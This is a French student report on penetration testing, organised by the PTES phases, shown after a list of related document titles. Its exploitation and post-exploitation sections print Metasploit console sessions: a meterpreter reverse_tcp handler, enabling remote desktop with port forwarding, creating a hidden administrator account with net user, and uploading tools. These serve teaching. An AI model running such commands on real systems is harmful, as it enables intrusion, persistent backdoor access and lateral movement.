TEST D INTRUISION. Document Technique



Documents pareils
Table des matières. Avant-propos... Préface... XIII. Remerciements...

Formation en Sécurité Informatique

SECURIDAY 2012 Pro Edition

Atelier Pivoting KHOULOUD GATTOUSSI (RT3) ASMA LAHBIB (RT3) KHAOULA BLEL (RT3) KARIMA MAALAOUI (RT3)

Tutoriel sur Retina Network Security Scanner

Sécurité Informatique : Metasploit

Introduction. Pourquoi faire un pentest? Pourquoi Metasploit?

Fonctionnement de Iptables. Exercices sécurité. Exercice 1

Surveillance stratégique des programmes malveillants avec Nessus, PVS et LCE

Audits Sécurité. Des architectures complexes

FORMATION PROFESSIONNELLE AU HACKING

WDpStats Procédure d installation

Le scan de vulnérabilité

Netdays Comprendre et prévenir les risques liés aux codes malicieux

CHEF ATELIER CHEF ATELIER

IPS : Corrélation de vulnérabilités et Prévention des menaces

SECURIDAY 2013 Cyber War

Les différentes méthodes pour se connecter

Les risques HERVE SCHAUER HSC

ALOHA LOAD BALANCER MICROSOFT TERMINAL SERVICES LOAD-BALANCING AVEC SESSION BROKER

(1) Network Camera

Création d un «Web Worm»

Guide d installation JMap 5.0

Sécurité des systèmes d exploitation

Solutions McAfee pour la sécurité des serveurs

Sécurité des réseaux Les attaques

Audits de sécurité, supervision en continu Renaud Deraison

LINUX - Sécurité. Déroulé de l'action. - 3 jours - Contenu de formation

Nmap (Network Mapper) Outil d exploration réseau et scanneur de ports/sécurité

Sécurité de la ToIP Mercredi 16 Décembre CONIX Telecom

Outils d'analyse de la sécurité des réseaux. HADJALI Anis VESA Vlad

La Pédagogie au service de la Technologie

La gestion des vulnérabilités par des simulations d'attaques

INTRUSION SUR INTERNET

SUPERVISION DE RÉSEAU AVEC NAGIOS

Protection des protocoles

Guide Installation Serveur Extensive Testing

Guide Installation Serveur Extensive Testing

CSI351 Systèmes d exploitation Instructions pour rouler Linux avec Virtual PC dans la salle de labo 2052

Guide d installation de SugarCRM Open Source version 4.5.1

Table des matières. 1. Installation de VMware ESXI Pré-requis Installation... 3

La sécurité applicative et les tests d'intrusion, beaucoup plus qu'un scan automatisé. Conférence ASIQ, mars 2014

INF8420 Éléments de sécurité informatique Hiver 2008 TRAVAIL PRATIQUE 2 Prof. : José M. Fernandez

laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007

Firewall IDS Architecture. Assurer le contrôle des connexions au. Sécurité 1

Atelier Sécurité / OSSIR

Présentation et portée du cours : CCNA Exploration v4.0

INSTALLATION NG V2.1 D OCS INVENTORY. Procédure d utilisation. Auteur : GALLEGO Cédric 23/10/2014 N version : v1

DenyAll Detect. Documentation technique 27/07/2015

GlobalScape Secure FTP Server Buffer Overflow

1/ Introduction. 2/ Schéma du réseau

SECURIDAY 2012 Pro Edition

Le Centre canadien de réponse aux incidents cybernétiques (CCRIC)


BTS SIO option SISR Lycée Godefroy de Bouillon Clermont-Ferrand

Réseaux. Moyens de sécurisation. Plan. Evolutions topologiques des réseaux locaux

Description de l implantation dans le centre d examen (nom du service ou de l outil et caractéristiques techniques)

acpro SEN TR firewall IPTABLES

Compétences informatiques

Projet Sécurité des SI

Pourquoi choisir ESET Business Solutions?

OWASP Open Web Application Security Project. Jean-Marc Robert Génie logiciel et des TI

Open Vulnerability Assessment System

Expérience d un hébergeur public dans la sécurisation des sites Web, CCK. Hinda Feriani Ghariani Samedi 2 avril 2005 Hammamet

Sommaire. 1 Introduction Présentation du logiciel de commerce électronique 23

Le Client/Serveur avec Enterprise Miner version 4

Sécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin

Rapport de projet Prise en main, configuration et évaluation des performances d un

Network Shutdown Module V3 Extension du Manuel Utilisateur pour architecture Virtualisée VMWare ESX Server 3, 3.5

Contenu. Cocher : Network Policy and Access Services > Next > Next. Cocher : Network Policy Server > Next > Install

Vulnérabilités et sécurisation des applications Web

Fingerprinting d'applications Web

Présentation de la solution Open Source «Vulture» Version 2.0

Consultant Avant Vente Offre Management du SI

Installation de SCCM 2012 (v2)

FTPS AVEC UNE APPLIANCE FAST360 EN COUPURE. Table des matières

Microsoft web framework

Fiche technique: Sécurité des terminaux Symantec Endpoint Protection La nouvelle technologie antivirus de Symantec

Linux sécurité des réseaux

La gestion des correctifs de sécurité avec WinReporter et RemoteExec

2X ThinClientServer Guide d utilisation

Installation de GFI MailSecurity en mode passerelle

Les tests d intrusion dans les réseaux Internet, l outil Nessus

SECURITE. Figure 1. Incident réseau, source CERT. Nombre. Sécurité

Cybercriminalité. les tendances pour 2015

Technologies du Web. Créer et héberger un site Web. Pierre Senellart. Page 1 / 26 Licence de droits d usage

Fiche Technique. Cisco Security Agent

Trend Micro Worry-Free Business Security 8.0 Première installation : trucs et astuces

L état de l ART. Évolution récente des technologies. Denis Szalkowski Formateur Consultant

LICENCE PROFESSIONNELLE SYSTEMES INFORMATIQUES & LOGICIELS

Aurélien Bordes. OSSIR 13 juillet 2010

LIVRE BLANC. Mise en œuvre d un programme efficace de gestion des vulnérabilités

DenyAll Protect. Sécurité & accélération. Parefeux pour applications et services Web. de vos applications.

Bienvenue sur Lab-Windows Il n'y a de vents favorables que pour ceux qui ont un cap

L installation du module Webmail nécessite également quelques prérequis, à savoir :

Windows Server Chapitre 1: Découvrir Windows Server 2008

ENDPOINT SECURITY FOR MAC BY BITDEFENDER

Indicateur et tableau de bord

Transcription:

Document Technique TEST D INTRUISION Préparé et présenté par AMINATA THIAM 3 ème année Sécurité de la Technologie de l Information, la Cité Collégiale Cours analyse des risques et vulnérabilités Mars 2012

TABLE DES MATIERES Sommaire 1. Introduction... 3 2. Les tests d intrusion... 3 3. Outils requis... 3 4. Les différentes phases du PTES... 4 4.1 Pré-engagement... 4 4.2 Collecte de renseignements... 4 Collecte d information passive... 4 Collecte d information active:... 5 4.3 Analyse de la vulnérabilité... 5 4.4 Exploitation... 6 4.5 Exploitation Message (POST)... 7 5. Rapport... 8 6. Conclusion... 8 7. Annexe... 8

1. Introduction «L'information s'impose comme un des capitaux les plus précieux pour l'organisation». Le système d'information est essentiel à l'activité d une organisation. Il est donc vital de protéger ce patrimoine; cependant un faible niveau de sécurité peut engendrer des dommages sérieux à une organisation. Pour remédier ou prévenir à un tel désastre, il faut soi-même (l entreprise) faire des tests d intrusion de son système d information ou en conférer la charge à un organisme compétant. Les tests d intrusion sont un «sujet enclin et récurrent de la sécurité informatique : ils existent en théorie depuis toujours mais ne cessent d évoluer, en fonction des nouvelles familles de vulnérabilités, mais aussi en fonction des modes». 2. Les tests d intrusion Ils consistent généralement à simuler une attaque d'un utilisateur malveillant et à analyser les risques potentiels dus à : la conception de l'architecture une mauvaise configuration d'un système la robustesse des composants un défaut de programmation une vulnérabilité liée à la solution testée les procédures d'exploitation et d administration. Dans notre cas, nous allons nous mettre dans la peau du pirate pour mener à bien ce test et ainsi nous montrerons à chaque fois quelques exemples. Le principal but de cette manœuvre est de trouver des vulnérabilités exploitables en vue de proposer un plan d'actions permettant d'améliorer la sécurité de nos systèmes. 3. Outils requis Quelques pré-requis sont nécessaires : Une bonne connaissance des réseaux : routage, protocoles IP, architectures, etc. Une connaissance des systèmes (Linux, Unix, Windows, Mac, ), Une bonne pratique des architectures applicatives et des applications actuelles (serveurs Web, middlewares, bases de données, ). Ensuite, il est nécessaire de se constituer une plate-forme d intrusion (Dans notre cas BT5) Des outils de tests automatisés, comme (Nessus, Nexpose)

4. Les différentes phases du PTES 4.1 Pré-engagement Cette réunion d initialisation, permet de : donner une vision claire de la procédure des opérations poser les limites sur l étendu du test Établir la portée (nombre de machines?, liste des serveurs, répartition géographique) Les méthodes d attaque sont aussi soumises, par exemple, le fait d avoir le droit ou non d utiliser les techniques d ingénierie sociales sur les employés, et si oui, par quels vecteurs Établir la durée et l échéancier Établir les intervenants (en cas d urgence, communication lors du test ) 4.2 Collecte de renseignements Cette phase consiste à cueillir des informations sur l organisation et les éventuelles vulnérabilités de son système d informations. Elle se divise en deux parties: Collecte d information passive «foot printing»: cette méthode nous procure les informations ci-dessous : Type d information Outils IP, Serveur DNS Whois Adresse courriel google, theharvester.py, facebook Nom d usager Google, méta données Site web EXEMPLE :

Collecte d information active: sert à identifier le système d exploitation et les «patches» qui ont été appliqué: balayage de ports etc. Type d information Il permet de savoir quels sont les ports ouverts, fermés ou filtrés, ainsi que le système d exploitation et sa version. permet d obtenir des comptes valides. Outils Nmap nmap -O 10.100.0.40 Finger Exemple : Nom d usager Site web Google, méta données Google 4.3 Analyse de la vulnérabilité Cette démarche nous fournit les informations nécessaires au développement de stratégies d atténuation, d intervention et de rétablissement. De ce fait, nous allons nous penché sur quels sont les actifs? Comment accède t on la cible? Comment se servir des exploits à partir de l information trouvée précédemment. Une analyse de type : Il existe un grand nombre de menaces : (Interne, Externe, Administrateur corrompu) Quelles sont les menaces qu il serait intéressant de représenter? Trouver des vulnérabilités existantes (manuellement/scanner) Balayage réseau (Nexpose)

Balayage réseau (Nessus) Balayage Web (Netsparker) Metasploit scanner (Metasploit Unleashed) Recherche de nouveaux exploits ou 0-day attacks (sites spécialisés) Test des exploits contre le système d antivirus utilisé Exemple : Basic scan : root@bt:~: /opt/framework/msf3/# nc 192.168.1.100 Avec l outil Nexpose root@bt:~# /etc/init.d/nexposeconsole.rc start Nexpose avec Msfconsole: msf > nexpose_connect cisco:cisco1234@192.168.16.112:3780 ok msf > load nexpose msf > nexpose_scan 192.168.1.100 msf > hosts c address msf > vulns Nexpose avec GUI https://192.168.16.112:3780 LISTE DES VULNERABILITES Vulnerability Listing Vulnerability Severity Instances Apache httpd mod_isapi module unload flaw (CVE-2010-0425) Critical 4 MySQL yassl CertDecoder::GetName Multiple Buffer Overflows Critical 1 PHP Fixed SplObjectStorage unserialization problems Critical 1 PHP Integer overflow in shmop_read( Critical 1 PHP format-string vulnerability on Phar Critical 1 PHP use-after-free in substr_replace() Critical 1 PHP Fixed stack buffer overflow in socket_connect() Critical 1 PHP Fixed MOPS-2010-24 Severe 1 PHP utf8_decode vulnerabilities and deficiencies in the number of reported malformed sequences Severe 1 PHP File path injection vulnerability in RFC1867 File upload filename Severe 1 MySQL Directory Traversal and Arbitrary Table Access Vulnerability Severe 1 MySQL COM_FIELD_LIST Command Buffer Overflow Vulnerability Severe 1 DNS server allows cache snooping Severe 2! 4.4 Exploitation Cette phase a pour objectif d exploiter les vulnérabilités trouvées dans la phase précédente dans le but de s introduire sur les machines. Dans le cas d une intrusion, on doit prouver l intrusion :

En fournissant par exemple les informations confidentielles du système d information. En démontrant qu on a pu écrire ou modifier les données Exemple root@bt:/opt/framework3/msf3# msfconsole msf > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 172.16.32.129 LHOST => 172.16.32.129 smsf exploit(handler) > set LPORT 443 LPORT => 443 exploit(handler) > load auto_add_route [*] Successfully loaded plugin: auto_add_route msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse handler on 172.16.32.129:443 [*] Starting the payload handler... msf exploit(handler) > 4.5 Exploitation Message (POST) Dans cette phase, nous allons pivoter à travers une vulnérabilité pour accéder à d autres machines ou services. Exemple : Meterpreter meterpreter > run getgui -e -f 8080 [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez carlos_perez@darkoperator.com [*] Enabling Remote Desktop [*] RDP is already enabled [*] Setting Terminal Services service startup mode [*] Terminal Services service is already set to auto [*] Opening port in local firewall if necessary [*] Starting the port forwarding at local port 8080 [*] Local TCP relay created: 0.0.0.0:8080 <-> 127.0.0.1:3389 meterpreter > shell Process 2480 created. Channel 6 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>net user msf metasploit /add net user msf metasploit /ADD The command completed successfully.

C:\WINDOWS\system32>net localgroup administrators msf /add net localgroup administrators msf /add The command completed successfully. C:\WINDOWS\system32> C:\WINDOWS\system32>^Z Background channel 6? [y/n] y meterpreter > upload nmap.exe [*] uploading : nmap.exe -> nmap.exe [*] uploaded : nmap.exe -> nmap.exe meterpreter > 5. Rapport Le rapport contient une description précise de la visibilité de la plate-forme à partir de de l extérieur, une liste des vulnérabilités identifiées et cataloguées accompagnée par les mesures à prendre pour la corriger. Enfin, les risques résiduels éventuels sont aussi présentés et qualifiés. (Un modèle de rapport en annexe) 6. Conclusion Les tests d intrusion sont nécessaires, surtout avant la mise en ligne d un nouveau système car c est le moyen qui permet de s assurer de son niveau de sécurité vis-à-vis de l extérieur, ainsi, chaque test d intrusion découle un niveau de sécurité croissant. 7. Annexe Rapport.pdf